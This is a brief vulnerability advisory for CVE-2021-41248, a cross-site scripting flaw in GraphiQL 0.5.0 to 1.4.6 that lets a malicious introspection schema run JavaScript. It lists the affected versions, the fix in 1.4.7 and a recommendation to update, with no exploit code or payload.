Advisory #60
TitleGraphiQL introspection schema template injection attack
CVE IDCVE-2021-41248
VendorGraphQL Foundation
Affected productGraphiQL
Affected versions0.5.0 - 1.4.6
Vulnerability typeCWE-79 (Cross-site Scripting)
DescriptionGraphiQL has a cross-site scripting vulnerability, which allows a malicious schema to execute arbitrary JavaScripts.
StatusFixed in 1.4.7
RecommendationUpdate to 1.4.7 or above.